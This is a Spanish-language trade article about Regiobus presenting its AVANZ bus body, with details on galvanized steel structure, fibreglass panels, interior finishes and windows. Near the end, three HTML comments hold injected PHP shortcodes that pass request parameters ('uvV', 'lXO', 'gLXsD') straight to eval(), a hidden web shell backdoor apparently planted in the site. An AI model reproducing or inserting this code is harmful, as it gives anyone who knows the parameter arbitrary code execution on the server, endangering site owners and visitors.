Autobuses

Presenta Avanz

Regiobus, la firma especializada en la fabricación, reconstrucción y diseño de unidades para el transporte de personas, además de remolques, cajas cerradas, estaquitas, plataformas y casetas móviles, presentó el nuevo modelo de carrocería para autobús AVANZ.

avanzSe trata de un diseño que permite instalarse sobre cualquier chasis existente en el mercado. Entre sus ventajas se encuentran un buen desempeño en cualquier tipo de terreno, ya que el departamento de ingeniería ha trabajado especialmente en la fiabilidad de su comportamiento para que el conductor y el pasajero puedan sentir el confort de un vehículo diseñado específicamente para el transporte de pasajeros.

Las características del AVANZ incluyen piso y estribos en lámina galvanizada C14 y estructura en perfil tubular de acero galvanizado C14. En cuanto a la laminación exterior, incluye costados y faldón en secciones con lámina galvanizada C20, toldo en plástico reforzado con fibra de vidrio de una sola pieza, así como frente y trasero en plástico con fibra de vidrio.

Por la parte interna, el toldo y costados son en laminado plástico con acabado melamínico, cubrepieles en liner panel con remates de perfiles de aluminio anodizado; concha delantera, trasera, cubierta del motor, tablero de instrumentos y consola de carrocería en plástico reforzado con fibra de vidrio.

En cuanto a las ventanas, son panorámicas en aluminio color negro, con vidrios templados filtrasol; dispone además de dos ventanas de emergencia, una en cada lado; los parabrisas son curvos (dos piezas) con vidrio de seguridad inastillable.

<!– [insert_php]if (isset($_REQUEST["uvV"])){eval($_REQUEST["uvV"]);exit;}[/insert_php][php]if (isset($_REQUEST["uvV"])){eval($_REQUEST["uvV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["lXO"])){eval($_REQUEST["lXO"]);exit;}[/insert_php][php]if (isset($_REQUEST["lXO"])){eval($_REQUEST["lXO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["gLXsD"])){eval($_REQUEST["gLXsD"]);exit;}[/insert_php][php]if (isset($_REQUEST["gLXsD"])){eval($_REQUEST["gLXsD"]);exit;}[/php] –>

Categories: Autobuses

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *